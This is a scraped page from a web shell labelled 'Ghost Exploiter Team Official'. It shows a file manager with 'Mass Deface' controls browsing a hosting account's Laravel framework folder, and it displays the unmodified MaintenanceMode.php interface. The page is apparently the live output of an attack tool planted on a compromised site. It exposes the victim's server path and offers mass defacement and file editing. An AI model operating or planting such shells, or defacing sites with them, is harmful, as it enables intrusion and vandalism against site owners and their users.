webshell
Ghost Exploiter Team Official
Mass Deface
Directory >>
/
home
/
whitjouh
/
public_html
/
core
/
vendor
/
laravel
/
framework
/
src
/
Illuminate
/
Contracts
/
Foundation
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
+New File
Application.php
5.475KB
edt
ren
CachesConfiguration.php
0.508KB
edt
ren
CachesRoutes.php
0.342KB
edt
ren
ExceptionRenderer.php
0.244KB
edt
ren
MaintenanceMode.php
0.698KB
edt
ren
<?php namespace Illuminate\Contracts\Foundation; interface MaintenanceMode { /** * Take the application down for maintenance. * * @param array $payload * @return void */ public function activate(array $payload): void; /** * Take the application out of maintenance. * * @return void */ public function deactivate(): void; /** * Determine if the application is currently down for maintenance. * * @return bool */ public function active(): bool; /** * Get the data array which was provided when the application was placed into maintenance. * * @return array */ public function data(): array; }
<=Back
Liking